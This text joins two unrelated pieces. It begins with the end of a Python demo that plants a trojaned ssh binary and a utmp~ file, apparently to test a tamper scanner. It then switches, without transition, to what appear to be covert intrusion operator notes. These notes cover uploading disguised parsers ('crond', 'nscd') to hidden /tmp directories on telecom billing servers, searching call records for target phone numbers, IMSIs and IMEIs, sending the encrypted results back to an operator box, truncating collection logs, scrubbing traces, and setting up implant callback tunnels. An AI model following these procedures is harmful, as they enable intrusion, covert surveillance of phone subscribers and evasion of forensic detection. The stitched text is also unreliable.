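        ssh = os.path.join(bindir, "ssh")
        with open(ssh, "wb") as fh:
            fh.write(b"#!/bin/sh\necho genuine ssh\n")
        old_ns = (int(time.time()) - 30 * 86400) * 1_000_000_000  # a month-old mtime
        os.utime(ssh, ns=(old_ns, old_ns))
        utmp = os.path.join(rundir, "utmp")
        with open(utmp, "wb") as fh:
            fh.write(b"\0" * 64)
        os.chmod(utmp, 0o644)
        manifest = baseline([ssh])
        time.sleep(1.1)  # let ctime move even on coarse-grained filesystems
        # artefacts: overwrite in place (same inode), restore mtime, add a 0666 utmp~
        with open(ssh, "r+b") as fh:
            fh.write(b"#!/bin/sh\necho trojaned ssh\n")
        os.utime(ssh, ns=(old_ns, old_ns))
        utmp_copy = os.path.join(rundir, "utmp~")
        with open(utmp_copy, "wb") as fh:
            fh.write(b"\0" * 64)
        os.chmod(utmp_copy, 0o666)
        found = scan(manifest, [rundir])
    return {k: sorted(os.path.basename(p) for p in v) for k, v in found.items()}


if __name__ == "__main__":
    for category, names in demo().items():
        print(f"{category}: {names}")
```

Against a real host the manifest would come from the package database or a trusted image rather than from the live box.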
### Cleanup:
-rm .st .sb ssh
############################
# DUBMOAT COLLECTION
############################
-ls /var/adm/utmp*
-get -l /var/adm/utmp~
### Locally, extract the data from the encrypted file:
cd /current/down
/current/bin/ExtractData ./utmp > dub.TARGETNAME
### Verify the contents and take note of the file size field near
### the beginning of the output. Use that size to truncate the file
### in the next step:
cat dub.TARGETNAME
### Upload the tool used to truncate the dubmoat collection file
-put /current/bin/TruncateFileRemote dmt
chmod 700 dmt
### Using the first "FILE SIZE" field from the output above,
### truncate the most recent collection out of the file
-lt /var/adm/utmp~
./dmt /var/adm/utmp~
-lt /var/adm/utmp~
-rm dmt
###
### END File user.tool.dubmoat.COMMON
### (see also ../etc/user.tool.dubmoat.COMMON)
###

### BEGIN File user.tool.cursehappy.COMMON (see also ../etc/user.tool.cursehappy.COMMON)
###
################ CURSEHAPPY #########################
############### PARSING ###################################################################
### vi Search/Replace commands
###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Rec type - record type correlates with ProjectName, valid values: eh, ls, ss, wb
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from the md5sum command below)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.cursehappy.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search for are available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:
### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the empty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate line
# make sure there are NO EMPTY LINES!!!!
# Format of each type of argument:
# p123456789 - phone number
# s123456789 - IMSI
# e123456789 - IMEI
# c123/456 - Cell/LAC (no leading 0's)
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt
########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage; once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the cursehappy commands.
### Typical file locations per host:
########################## wholeblue:
# tpmw01 10.3.4.55
# tpmw02 10.3.4.56
### verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
### shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
# isbapro1 10.5.7.51
# nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10
-lt /u03/archive/collect
# newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
# old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10
########################## editionhaze:
ls -latr /u06/saba/CDR/out/MS* | head -10
ls -latr /u06/saba/CDR/out/MS* | tail -10
ls -latr /u06/saba/CDR/out/MS* | wc -l
########################## liquidsteel:
########################## sicklestar:
### magnum: CURSEHAPPY not working on all SS .usd files :-(
### Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
### If none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
########################## CURSEHAPPY ########################################################
###############################################################################################
### Now, encrypt the ascii list...first make sure you have the encryption tool:
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool is not in PATH, change your PATH or insert the full path in the command
### to encrypt one at a time...skip to the next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### to encrypt all at the same time (match *.txt only, so the .enc outputs are not re-read on a second run):
for i in argfile*.txt ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### encrypt the def files
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -l
file /current/up/cursedefs/*.enc
### Tips for running CURSEHAPPY 4.0
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc. if additional
### passes are needed for the date range
### DO NOT use -loglevel if also using >L: or >T: (mixed output corrupts the decryption)
### The phone list is NOT deleted automatically in v3.2
### remove it between each run as a practice
### Useful options:
-n             name of text file containing phone numbers
-files         list of files to parse (can contain wildcards); optional - same as no option
-d             output optional fields
-all           all record output (no search performed)
-loglevel [#]  level of info emitted via stderr: 0,1,2,3
-def           definition file (required)
-lb            leave behind mode
######## Upload the parser (CURSEHAPPY) and call it crond
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/cursehappy4 crond
##### Upload the encrypted phone list as adm, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
############ argfile 1
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc adm
-put /current/up/cursedefs/PROJECTNAME.enc adm~
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[012]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile2.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile3.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[3456]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc adm
-put /current/up/cursedefs/PROJECTNAME.enc adm~
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.enc3.more
-beep 15
#############
############# for loglevel testing (local file should be ascii?)
#############
-put /current/up/cursedefs/PROJECTNAME.enc adm~
-put /current/down/argfiles/argfile1.enc adm
KEY=CRYPTKEY; export KEY; ./crond -def ./adm~ -n ./adm -w e -loglevel 2 -d /CHANGEME/CDRFILES.2006071[0-2]* >T:/current/down/cdrhits.cursehappy.HOST.DDMonYY.test
-beep 15
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc1 -o cdrhits.cursehappy.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.cursehappy.HOST.DDMonYY.enc2 -o cdrhits.cursehappy.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)
cd /current/down
for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*
######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef |grep crond
### if the parser command is still "running", then kill the process:
### kill -9
### You'll still be able to decrypt the partially completed data pull
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm crond adm adm~
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.cursehappy.COMMON
### (see also ../etc/user.tool.cursehappy.COMMON)
###

### BEGIN File user.tool.orleansstride.COMMON (see also ../etc/user.tool.orleansstride.COMMON)
###
################ ORLEANSSTRIDE #########################
############### PARSING ###################################################################
### vi Search/Replace commands
###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from the md5sum command below)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.orleansstride.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search for are available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:
### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the empty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate line
# make sure there are NO EMPTY LINES!!!!
# if searching for LACs and cell id's, use the format in the documentation:
# ex. - 410 01 95 18374
# if searching for phone numbers, use the normal format:
# ex. - 4837506
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt
### For ORLEANSSTRIDE, the numbers must be in sorted order...the following loop
### will put all of the files in sorted order (the input file must be named, or sort reads stdin)
cd /current/down/argfiles
for i in argfile*.txt; do sort -u -o `basename $i .txt`.sorted $i; done
### Make sure you can find the cryptTool...add it to PATH if which fails...
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### To encrypt one at a time...
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.sorted -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.sorted -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### Loop to encrypt all the argfiles
cd /current/down/argfiles
for i in argfile*.sorted; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .sorted`.enc -k CRYPTKEY -b ; done
file argfile*.enc
########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage; once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the orleansstride commands.
### Typical file locations per host:
########################## sicklestar:
# magnum 10.140.0.68
ls -lart /archive/cdrc/*mob | head -10
ls -lart /archive/cdrc/*mob | tail -10
ls -lart /archive/cdrc/input/DONE/*mob | head -10
ls -lart /archive/cdrc/input/DONE/*mob | tail -10
### Tips for running ORLEANSSTRIDE 1.0
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc. if additional
### passes are needed for the date range
### The phone list is deleted automatically
######## Upload the parser (ORLEANSSTRIDE) and call it nscd
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/orleansstride.v1.0.SunOS5.8.targetsl nscd
##### Upload the encrypted phone list as awk, modify each parser command to have the
##### correct directory and date range of files to parse, then run the parser:
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
############ argfile 1
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile2.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc2.more
-beep 15
############ argfile 3
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[789]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile3.enc awk
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -P ./awk
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc3.more
-beep 15
######
###### survey mode:
######
### checks for IMEIs that have more than one IMSI associated with them:
### to limit the amount of memory used, replace "-x" with "-X numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -x
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyIMEI
### generates a list of Cell IDs associated with each MSC address:
### to limit the amount of memory used, replace "-y" with "-Y numberBytes"
-setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -y
./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyMSC
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc1 -o cdrhits.orleansstride.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc2 -o cdrhits.orleansstride.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)
cd /current/down
for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*
######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef |grep nscd
### if the parser command is still "running", then kill the process:
### kill -9
### You'll still be able to decrypt the partially completed data pull
######
###### copy DECRYPTED data to media
######
ls -l cdr*txt*
mz
cp cdr*txt* /mnt/zip*/PROJECTNAME
ls -l /mnt/zip*/PROJECTNAME
uz
#####
##### clean up
#####
-rm nscd awk
-lt
-cd /tmp
-rm .scsi
-lt
w
ps -ef | sort
-lt /
-burnBURN
###
### END File user.tool.orleansstride.COMMON
### (see also ../etc/user.tool.orleansstride.COMMON)
###

### BEGIN File user.tool.skimcountry.COMMON (see also ../etc/user.tool.skimcountry.COMMON)
###
################ SKIMCOUNTRY #########################
############### PARSING ###################################################################
### vi Search/Replace commands
###
### ProjectName - self explanatory
### Date field - today's date, used for output files
### Host - hostname of the box (not IP address)
### Cryptkey - encryption key (use output from the md5sum command below)
md5sum /current/down/tcpdump.raw
mx
:%s/PROJECTNAME/PROJECTNAME/g
:%s/DDMonYY/DDMonYY/g
:%s/HOST/HOST/g
:%s/CRYPTKEY/CRYPTKEY/g
'x
### Save the encryption key locally:
echo CRYPTKEY > /current/down/cryptkey.skimcountry.DDMonYY
####### Prepare files containing numbers to search for:
# if files containing the numbers to search for are available:
mkdir /current/down/argfiles
cd /current/down/argfiles
mz
cp /mnt/zip*/arg* /current/down/argfiles
#or
cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles
ls -altr
### Prep the argfiles:
### make sure the files are ASCII and contain NO EMPTY LINES!!
### make sure the last line does not contain a null character at the end
### (vi the file, add a carriage return to the last line, then delete the empty
### line and save)
### "file" results:
### This will not work: ASCII text, with CRLF line terminators
### This WILL: ASCII text
cat arg*
file arg*
dos2unix arg*
file arg*
# if no data media is provided:
# locally, create a file of numbers to grep for with each number on a separate line
# make sure there are NO EMPTY LINES!!!!
# Format of each type of argument:
# p123456789 - phone number
# s123456789 - IMSI
# e123456789 - IMEI
# c123/456 - Cell/LAC (no leading 0's)
cd /current/down/argfiles
vi /current/down/argfiles/argfile1.txt
########## To look at CDR directories try the following:
### Use the following commands to determine the location of current
### CDR data storage; once you identify the location of the data, you'll
### use the head/tail commands to determine the date ranges being saved.
### These date ranges will be used as args in the skimcountry commands.
### Typical file locations per project:
########################## wrathhatch:
# HOST 172.16.1.36
# active directories:
-lt /var/archive/output_billing
# this script should point to the backup directory location:
-vget /var/archive/output_billing/MoveData.sh
# backup directories:
-lt /u01/oradata/output_billing/
-lt /u01/oradata/output_billing/0-9AugData/output_billing
-lt /u01/oradata/output_billing/AugData/output_billing
# get time ranges of active directories:
ls -latr /var/archive/output_billing/isb/*ama | head -10
ls -latr /var/archive/output_billing/isb/*ama | tail -10
ls -latr /var/archive/output_billing/isb2/*ama | head -10
ls -latr /var/archive/output_billing/isb2/*ama | tail -10
ls -latr /var/archive/output_billing/isb/*ama | wc -l
ls -latr /var/archive/output_billing/fsd1/*ama | head -10
ls -latr /var/archive/output_billing/fsd1/*ama | tail -10
ls -latr /var/archive/output_billing/fsd2/*ama | head -10
ls -latr /var/archive/output_billing/fsd2/*ama | tail -10
ls -latr /var/archive/output_billing/fsd3/*ama | head -10
ls -latr /var/archive/output_billing/fsd3/*ama | tail -10
ls -latr /var/archive/output_billing/fsd4/*ama | head -10
ls -latr /var/archive/output_billing/fsd4/*ama | tail -10
### to pull a complete directory listing to the ops box:
ls -latr /var/archive/output_billing/isb >L:/current/down/list_isb
########################## SKIMCOUNTRY ########################################################
###############################################################################################
### Now, encrypt the ascii list locally...first make sure you have the encryption tool:
cd /current/down/argfiles
which cryptTool.v1.0.Linux2.4.18-14.targetdl
### If cryptTool is not in PATH, change your PATH or insert the full path in the command
### to encrypt one at a time...skip to the next comment to encrypt all at once:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b
cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b
file argfile*.enc
### to encrypt all at the same time (match *.txt only, so the .enc outputs are not re-read on a second run):
for i in argfile*.txt ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
### Tips for running SKIMCOUNTRY 3.2
### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!!
### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc. if additional
### passes are needed for the date range
### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption)
### The phone list is deleted automatically now
### Useful options:
-k   encryption key
-o   print filenames being parsed
-P   encrypted phone list
-p   plaintext phone list
-r   DO NOT remove phone list after reading it in
-z   unix list of files to parse
-w   do not encrypt the output list (not recommended since the file is created on target)
### Suggested -z options:
### this looks in subdirs, so use caution in the backup dir (can be good AND bad):
### Also circumvents the "parameter list too long" problem with wildcards with 'ls'
-z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -print"
### works, but only for smaller ranges (command line arglist gets long)
-z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*"
##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc)
##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.)
##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS
### benchmarking:
# phonelist had 44 numbers
# 3 day pull took 38 minutes over ALL directories
# 1 day average pull took 10-13 minutes
### file name extensions:
# GCDR = Nor
# usd = Sie
######## Upload the parser (SKIMCOUNTRY) and call it crond
# put up the parser tool
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl crond
# or
-put /mnt/zip*/skimcountry.v1.2.SunOS5.9.targetdl crond
##### Upload the encrypted phone list as adm, then run the parser:
############ argfile 1
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1
-beep 15
### Run again if needed for same tasking
-put /current/down/argfiles/argfile1.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1.more
-beep 15
############ argfile 2
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2
-beep 15
-put /current/down/argfiles/argfile2.enc adm
./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2.more
-beep 15
######
###### to parse other vendor files:
######
#./crond -k CRYPTKEY -P adm -z "ls -1rt /var/archive/output_billing/*/MSC*20060629*usd*ama" > .mcftpl38755
######
##### when it's done running, decrypt the file (-d -c options)
######
cd /current/down
ls -latr cdr*enc*
# to decrypt individually:
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc1 -o cdrhits.skimcountry.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c
cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc2 -o cdrhits.skimcountry.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c
# or decrypt all at one time (once all are written fully)
cd /current/down
for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done
ls -latr cdr*txt*
######
###### If you need to stop the parser before it completes:
### Control-C the nopen window containing the parser command
### ps -ef |grep crond
### if the parser command is still "running", then kill the process:
### kill -9
### You'll still be able to decrypt the partially completed data pull
######
#### target cleanup
-rm adm crond
-cd /tmp
-rm .scsi
-burnBURN
### You're done!
###
### END File user.tool.skimcountry.COMMON
### (see also ../etc/user.tool.skimcountry.COMMON)
###

### BEGIN File user.tool.dairyfarm.COMMON (see also ../etc/user.tool.dairyfarm.COMMON)
###
###################################################################
### DAIRYFARM
###################################################################
DAIRYFARM procedures:
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WINDOWS_REDIR_IP/WINDOWS_REDIR_IP/g
:%s/LINUX_OP_BOX_IP/192.168.254.71/g
:%s/WINDOWS_OP_BOX_IP/192.168.254.72/g
:%s/CONTROL_PORT/CONTROL_PORT/g
:%s/XSERVER_PORT/XSERVER_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/NOPEN_PORT/NOPEN_PORT/g
:%s/RAT_NAME/sendmail/g
:%s,TMP_DIR,/tmp/.scsi,g
`x
### Follow steps in this order:
### 1) on linux box, start dairyfarm client:
#./df_client 35535 127.0.0.1:40211
#./df_client CONTROL-PORT 127.0.0.1:XSERVER-PORT
./df_client CONTROL_PORT 127.0.0.1:XSERVER_PORT
### 2) on windows redir, set up tunnels:
### the next line replaces the normal tunnel to call back to the xserver port
### and references the df control port instead
#background redirect -tcp -implantlisten 35535 -target 192.168.254.131 35535 -nodes 40
#background redirect -tcp -implantlisten CONTROL-PORT -target LINUX-OP-BOX CONTROL-PORT -nodes 40
